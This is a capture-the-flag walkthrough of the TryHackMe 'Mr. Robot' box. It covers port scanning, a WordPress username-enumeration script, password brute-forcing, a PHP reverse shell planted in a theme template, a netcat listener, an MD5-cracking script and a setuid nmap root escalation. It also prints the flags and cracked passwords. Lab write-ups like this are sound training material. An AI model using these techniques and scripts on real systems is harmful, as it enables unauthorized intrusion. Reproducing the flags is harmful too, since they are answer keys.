TryHackMe – Mr. Robot Capture The Flag (CTF) Challenge


Have you seen the hacker-themed TV show Mr. Robot?

This article is a write-up of the walkthrough video for the CTF (Capture The Flag) style hacking challenge, Mr. Robot, on TryHackMe.

The challenge involves standard pen-testing tools: nmap for port and service enumeration, gobuster for brute-forcing directory names on the web server, and wpscan for brute-forcing a WordPress password. To retrieve the last flag we abuse a binary that has the setuid bit set and therefore runs as root.

First, we connect to the VPN with OpenVPN, start up our target machine, and then note down our IPs.

export myIP=10.6.2.23
export targetIP=10.10.58.206

Enumeration

Let’s start scanning the target machine with nmap.

sudo nmap -Pn -sC -p- -O $targetIP
  • -Pn skips host discovery (treat the host as up even if it ignores ping)
  • -sC runs the default NSE scripts
  • -p- scans all 65535 TCP ports
  • -O enables OS detection (needs raw sockets, hence sudo)

Here’s the output:

┌──(tester㉿box)-[~]
└─$ sudo nmap -Pn -sC -p- -O $targetIP
[sudo] password for tester:
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-01 12:16 EST
Stats: 0:00:19 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 7.58% done; ETC: 12:20 (0:03:52 remaining)
Stats: 0:13:21 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 90.25% done; ETC: 12:30 (0:01:27 remaining)
Stats: 0:13:43 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 91.88% done; ETC: 12:30 (0:01:13 remaining)
Nmap scan report for 10.10.15.66
Host is up (0.081s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
|_http-title: Site doesn't have a title (text/html).
443/tcp open   https
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
|_http-title: Site doesn't have a title (text/html).
Device type: general purpose|specialized|storage-misc|WAP|broadband router|printer
Running (JUST GUESSING): Linux 3.X|5.X|4.X|2.6.X (91%), Crestron 2-Series (89%), HP embedded (89%), Asus embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:5.4 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6.22 cpe:/o:linux:linux_kernel:2.6 cpe:/h:asus:rt-n56u
Aggressive OS guesses: Linux 3.10 - 3.13 (91%), Linux 5.4 (91%), Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 3.2 - 3.5 (90%), Linux 3.2 - 3.8 (90%), Linux 4.2 (90%), Linux 4.4 (90%)
No exact OS matches for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 942.40 seconds

The full-port scan took almost 16 minutes because the 65,532 filtered ports never answer. What we get back is 22/tcp closed and a web server on 80 and 443 with a placeholder certificate for www.example.com. For further enumeration of that web server, let’s grab SecLists (a collection of standard wordlists) from the git repo at https://github.com/danielmiessler/SecLists.git and run gobuster with its big.txt wordlist:

sudo gobuster dir -w /home/tester/hacking-tools/SecLists/Discovery/Web-Content/big.txt -u http://10.10.15.66
  • -w for wordlist
  • -u for url

The most interesting results are robots.txt and /wp-admin (which, while we are not logged in, redirects to the WordPress login page). Let’s look at both to see what additional hints we can find.

We discover (no surprise!) a WordPress login page at $targetIP/wp-login.php.

Looking at $targetIP/robots.txt we find:

User-agent: *
fsocity.dic
key-1-of-3.txt

Locating The First Key

If we navigate in our browser to $targetIP/fsocity.dic, we download a dictionary file, fsocity.dic. Browsing through it, it looks like a password wordlist. It is also a long one in which most lines are repeated, so deduplicating it before any brute-force attack saves a lot of time.

$targetIP/key-1-of-3.txt reveals our first of three keys:
073403c8a58a1f80d943455fb30724b9

Determining The Username

Now that we have a WordPress login page and a password wordlist (fsocity.dic), all we need is a valid username, and we will be ready to brute-force our way into the admin dashboard with wpscan.

After inspecting the login page, we guess a few names from the Mr. Robot show: Elliot, Mr. Robot, Tyrell.

The error messages from the login page reveal that Elliot is a valid username, while Mr. Robot and Tyrell are not: for an existing account WordPress complains that the password is incorrect, while for an unknown account it says “Invalid username”. To confirm this, we can also try the misspelling Elliott (with two t’s) with a random password and see that the error returned is the “Invalid username” one.
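The check above can be automated. The script below is an added example, not part of the original walkthrough: it posts one login attempt per candidate name and classifies the reply by the error text WordPress puts on the login page. The target URL and the candidate names are assumptions, and the two sample response bodies are constructed (abbreviated from the markup wp-login.php prints) so the classifier can be exercised without touching the network.

```python
"""Enumerate WordPress usernames through wp-login.php error messages.

Added example for this write-up; target URL and candidate names are assumptions.
"""
import urllib.error
import urllib.parse
import urllib.request

# Error text wp-login.php places in <div id="login_error">. The first phrase is
# the one the walkthrough observed; the later ones are the wording newer
# WordPress releases use for the same conditions.
UNKNOWN_USER_PHRASES = ("Invalid username", "is not registered on this site")
KNOWN_USER_PHRASES = ("The password you entered for the username",)


def classify_login_response(html: str) -> str:
    """Return 'valid' (account exists), 'invalid' (no such account) or 'unknown'."""
    if any(phrase in html for phrase in KNOWN_USER_PHRASES):
        return "valid"
    if any(phrase in html for phrase in UNKNOWN_USER_PHRASES):
        return "invalid"
    # No recognised error text: a lockout plugin, a WAF page, or an actual login.
    return "unknown"


def probe_username(login_url: str, username: str, password: str = "not-the-password") -> str:
    """POST a single login attempt (network I/O) and classify the reply."""
    form = urllib.parse.urlencode({
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
        "redirect_to": login_url,
        "testcookie": "1",
    }).encode()
    req = urllib.request.Request(login_url, data=form, headers={
        # wp-login.php rejects the form unless its test cookie is present.
        "Cookie": "wordpress_test_cookie=WP+Cookie+check",
        "User-Agent": "Mozilla/5.0",
    })
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            body = resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:  # some setups answer errors with 4xx
        body = err.read().decode("utf-8", errors="replace")
    return classify_login_response(body)


def enumerate_users(login_url: str, candidates) -> list:
    """Return the candidate names WordPress confirms as existing accounts."""
    return [name for name in candidates if probe_username(login_url, name) == "valid"]


# Constructed sample bodies, abbreviated from real wp-login.php error markup.
SAMPLE_INVALID_USER = (
    '<div id="login_error"><strong>ERROR</strong>: Invalid username.'
    ' <a href="/wp-login.php?action=lostpassword">Lost your password?</a></div>'
)
SAMPLE_WRONG_PASSWORD = (
    '<div id="login_error"><strong>ERROR</strong>: The password you entered for the'
    ' username <strong>elliot</strong> is incorrect.'
    ' <a href="/wp-login.php?action=lostpassword">Lost your password?</a></div>'
)

if __name__ == "__main__":
    # Assumed target; the candidate names come from the show, as in the write-up.
    TARGET = "http://10.10.58.206/wp-login.php"
    for name in ("elliot", "mrrobot", "tyrell", "elliott"):
        print(f"{name:10s} {probe_username(TARGET, name)}")
```

Every probe is a failed login, so it shows up in the target’s logs and will trip login-lockout plugins; the "unknown" result is the signal to slow down or stop rather than to keep guessing.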

Brute-Forcing The Password To WordPress Admin Dashboard

For this next attack we will use wpscan, a specialized WordPress scanning tool:

wpscan --url 10.10.58.206 -P /home/tester/Downloads/fsocity.dic --usernames elliot
  • -P for the password list
  • --usernames for the user(s) to try

The scan successfully found Elliot’s password!

successfully found Elliot's password: ER28-0652

Uploading a Malicious Payload

After logging in at $targetIP/wp-login.php we land on the dashboard. Appearance > Editor in the left sidebar lists the active theme’s template files, which we can edit in the browser.

Let’s replace the contents of the 404.php template with a malicious payload.

Spawning a Reverse Shell From WordPress

Beware the Backdoor! 🦋

For our malicious payload, we will use pentestmonkey’s php-reverse-shell from GitHub.

The only things to change in the payload are its $ip and $port variables: set them to our attack machine’s VPN IP (myIP) and the port our listener will use. After updating them, we paste the payload into 404.php and save.

To trigger it, we only need to request a page that does not exist, such as $targetIP/404.php, so that WordPress renders the 404 template; the listener must already be running when we do.

Let’s set up a listener with netcat:

sudo nc -lvnp 53

-lvnp

  • l = listen mode, for inbound connects
  • v = verbose
  • n = suppress name/port resolutions
  • p = port

We used port 53 for the listener because DNS traffic is rarely blocked by egress filters; as a privileged port (below 1024) it needs sudo to bind. Any port works, as long as the payload and the listener agree.

Success! We just caught the reverse shell with netcat. It is a bare, non-interactive shell (no job control, no tab completion, and a stray Ctrl+C kills the connection), so let’s stabilize it. First, spawn a proper TTY with Python:

python -c 'import pty;pty.spawn("/bin/bash")'

Next, background the shell with Ctrl+Z and, back on our own terminal, run:

stty raw -echo; fg

stty raw -echo puts our local terminal into raw mode, so keystrokes such as Ctrl+C and Tab are passed straight through to the remote shell instead of being interpreted locally; fg then brings the netcat session back to the foreground. Exporting TERM=xterm in the remote shell afterwards makes screen-oriented tools behave. We now have tab completion and command history, and, just as important for later, a TTY that lets us run su.

Cracking User robot’s Password Hash

Navigate to /home/robot and read the password file:

cat password.raw-md5

Output:

robot:c3fcd3d76192e4007dfb496cca67e13b

Found it! The file name already tells us the hash type: raw, unsalted MD5. Now all we need to do is look this hash up on a website that hosts dictionaries of cracked hashes, or crack it on our attack machine with a program like hashcat (mode 0 for raw MD5; because the file stores user:hash, pass --username so hashcat ignores the robot: prefix).

Using crackstation we find the cleartext of the password:

abcdefghijklmnopqrstuvwxyz
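Cracking the hash locally, as an added example that is not part of the original write-up: the script parses user:hash lines such as the one in password.raw-md5, picks the digest algorithm from the hex length (raw, unsalted hashes only), deduplicates the wordlist (fsocity.dic is mostly repeated entries) and hashes each word once per algorithm. The wordlist below is a constructed sample; against the real box you would feed it the lines of fsocity.dic or another wordlist.

```python
"""Dictionary attack on raw (unsalted) hashes stored in user:hash format.

Added example for this write-up; the wordlist below is a constructed sample.
"""
import hashlib

# Raw digest algorithms recognised by hex length; a raw-md5 file holds 32 hex chars.
ALGO_BY_HEX_LENGTH = {32: "md5", 40: "sha1", 64: "sha256"}


def parse_hash_file(text: str) -> list:
    """Parse 'user:hexhash' lines (as in password.raw-md5) into (user, hash) pairs."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        user, hexhash = line.split(":", 1)
        entries.append((user.strip(), hexhash.strip().lower()))
    return entries


def dedupe_wordlist(words) -> list:
    """Drop blank lines and repeats while keeping first-seen order."""
    return list(dict.fromkeys(w.rstrip("\r\n") for w in words if w.strip()))


def crack(entries, wordlist) -> dict:
    """Return {user: plaintext} for every hash whose preimage is in the wordlist."""
    # Group targets by algorithm so each word is hashed once per algorithm,
    # not once per target hash.
    targets = {}
    for user, hexhash in entries:
        algo = ALGO_BY_HEX_LENGTH.get(len(hexhash))
        if algo is None:
            continue  # salted or unknown format; needs a different attack mode
        targets.setdefault(algo, {})[hexhash] = user

    found = {}
    for word in dedupe_wordlist(wordlist):
        for algo, lookup in targets.items():
            digest = hashlib.new(algo, word.encode()).hexdigest()
            if digest in lookup:
                found[lookup[digest]] = word
    return found


# The line read from /home/robot/password.raw-md5 on the box.
HASH_FILE = "robot:c3fcd3d76192e4007dfb496cca67e13b\n"

# Constructed sample wordlist with the repeated entries typical of fsocity.dic.
SAMPLE_WORDLIST = [
    "password", "fsociety", "password", "ER28-0652",
    "abcdefghijklmnopqrstuvwxyz", "fsociety", "",
]

if __name__ == "__main__":
    for user, plaintext in crack(parse_hash_file(HASH_FILE), SAMPLE_WORDLIST).items():
        print(f"{user}:{plaintext}")
```

For a real wordlist, hashcat does the same job far faster and with rule-based mutations: hashcat -m 0 --username password.raw-md5 fsocity.dic, then --show to print the cracked pairs.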

Finding The Second Key

After switching over to user robot with our cracked password (su needs the TTY we set up while stabilizing the shell), a bit of enumeration in the home directory easily finds the key.

su robot
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

Privilege Escalation to Root

With the following command, we search for files that have the setuid or setgid bit set.

Such a file runs with the privileges of its owner (or group) rather than those of the user who launches it, so a setuid binary owned by root runs as root from a non-root account. GTFOBins has a comprehensive list of binaries whose features can be abused to carry out privilege escalation.

For this box, the command turns up several candidates:

find / -perm +6000 2>/dev/null | grep '/bin/'

The +mode syntax is what the old find on this box accepts; newer GNU findutils reject it, so use -perm /6000 there (or -perm -4000 to match only setuid files), and add -type f to skip directories.

We will move forward with nmap. The copy on this box is old enough to still have an interactive mode, and because the binary is setuid root, any command launched from it runs with root’s effective privileges.

We launch nmap in interactive mode with the command:

nmap --interactive

Inside the nmap> prompt, prefixing a line with ! runs it as a shell command (no sudo is involved; the privilege comes from the setuid bit, and GTFOBins’ own recipe is simply !sh for a root shell). After locating the file for key 3, we can cat it out, using ; to chain commands together.

nmap> !cd /root;cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

And now we have retrieved all three of Mr. Robot’s keys.